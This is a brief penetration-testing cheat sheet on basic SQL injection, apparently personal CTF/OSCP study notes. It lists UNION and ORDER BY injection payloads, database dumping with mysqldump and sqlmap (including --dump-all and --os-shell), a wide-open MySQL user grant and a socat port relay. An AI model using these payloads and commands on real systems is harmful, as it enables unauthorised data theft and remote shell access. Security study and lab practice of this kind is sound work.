sqli basic

Auth bypass

iamkashz/ctf-scripts/auth-bypass-sqli.txt

Tips

# when error; available columns = N-1
ORDER BY <N>--

# union [all] select 
UNION [ALL] SELECT 1,2,3,4-- -
UNION [ALL] SELECT NULL,NULL,NULL,NULL-- -

Using mysql-client

mysql -h <host-ip> [-P PORT]-u <username> -p [-e <SQL-QUERY-TO-RUN>]

mysqldump -u <user> -p <DB-name> > dump.mysql
mysqldump -u <user> -p --all-databases > dump.mysql

sqlite3

# to invoke SQLite
sqlite3 <db.dump>

# to find tables
sqlite> .tables

# to check schema for table
sqlite> PRAGMA table_info(<table-name>);

# Ctrl+D to break out

Start Mysql on kali

service mysql [status | start | stop]

# config file, set bindIP if needed
/etc/mysql/mariadb.conf.d/50-server.cnf

CREATE USER 'kashz'@'%' IDENTIFIED BY 'kashz';
GRANT ALL ON *.* TO 'kashz'@'%' IDENTIFIED BY 'kashz';
FLUSH PRIVILEGES;

# listen on 3306 from tun0 IP and route to 3306 via localhost
$ socat TCP-LISTEN:3306,fork,bind=10.10.16.161 TCP:127.0.0.1:3306

SQLMAP (DO NOT USE IN OSCP)

# method: POST
# capture request via burp > sql.txt

sqlmap -r <sql.txt> -p <paramter-to-check> <flag> [--proxy=http://127.0.0.1:808]

# --dbms=<mysql> or other.
# --dbs; -D <db>
# --tables; -T <table>
# --dump-all
# --os-shell
Previoussqli oracle odatNextsqli influxql

Last updated